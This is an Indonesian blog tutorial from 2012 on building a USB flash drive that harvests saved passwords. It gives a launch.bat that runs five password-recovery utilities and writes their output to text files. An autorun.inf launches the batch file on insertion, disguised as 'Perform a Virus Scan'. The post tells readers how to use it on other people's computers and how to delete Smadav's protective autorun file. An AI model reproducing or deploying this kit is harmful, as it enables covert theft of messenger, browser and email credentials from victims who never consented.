30 Mei 2012

Cara Hack Berbagai Macam Password Menggunakan USB Flashdisk


Tutorial ini menjelaskan cara hack password menggunakan usb flash drive.  Saya sudah membuat satu rar file yang berisi semua apa yang kamu butuhkan untuk hack password menggunakan usb, terdiri dari MessenPass, PasswordFox, Protected Passview, IE Passview, Mail passview, launch.bat , autorun.inf.

MessenPass adalah menampilkan sandi yang mengungkapkan password dari aplikasi messenger berikut  : MSN Messenger, Windows Messenger (In Windows XP) , Windows Live Messenger (In Windows XP/Vista/7) , Yahoo Messenger (Versions 5.x and 6.x), Google Talk, ICQ Lite 4.x/5.x/2003, AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro., Trillian, Trillian Astra, Miranda, GAIM/Pidgin, MySpace IM, PaltalkScene, Digsby
PasswordFox adalah pemulihan password kecil yang memungkinkan kamu untuk melihat nama pengguna dan password yang disimpan oleh browser Mozilla Firefox Web.
Protected Storage PassView adalah utilitas kecil yang mengungkapkan password disimpan di komputer kamu  dengan Internet Explorer, Outlook Express dan MSN Explorer.  Password diungkapkan dengan membaca informasi dari Protected Storage.
IE PassView adalah utilitas manajemen password kecil yang mengungkapkan password yang disimpan oleh browser Internet Explorer Web, dan memungkinkan kamu untuk menghapus password yang kamu tidak perlu lagi.  Mendukung semua versi Internet Explorer
Mail PassView adalah alat password – recovery kecil yang mengungkapkan password dan rincian rekening lainnya untuk klien email.
Launch .bat adalah batch script yang menjalankan semua program yang saya sebutkan di atas.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
autorun.inf akan berjalan launch.bat setelah memasukkan usb tersebut.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Cara Penggunaan :
1. Download programnya disini (203 Kb)
Password Rar : KLIK
2. Ekstrak file Rar tersebut, lalu akan muncul folder hack password.
3. Untuk menjalankan programmya, klik kanan file launch.bat pilih Run as administrator (kalau menggunakan Windows 7, kalau kamu pake Windows Xp, cukup di klik 2x aja)
Selanjutnya kamu akan mendapatkan file notepad yg berekstensi .txt
Buka file .txt tersebut, disanalah kamu bisa melihat password yang tersimpan di dalam komputer kamu atau orang lain.
Kalau mau secara otomatis mendapatkan password yg tersimpan di dalam komputer tujuan saat mencolokkan flashdisk kamu, copy file yang ada di folder hack password ke Flashdisk kamu (tanpa folder). Kalau ada file autorun.inf buatan smadav, kamu harus menghapusnya terlebih dahulu, caranya di bagian Settings Smadav.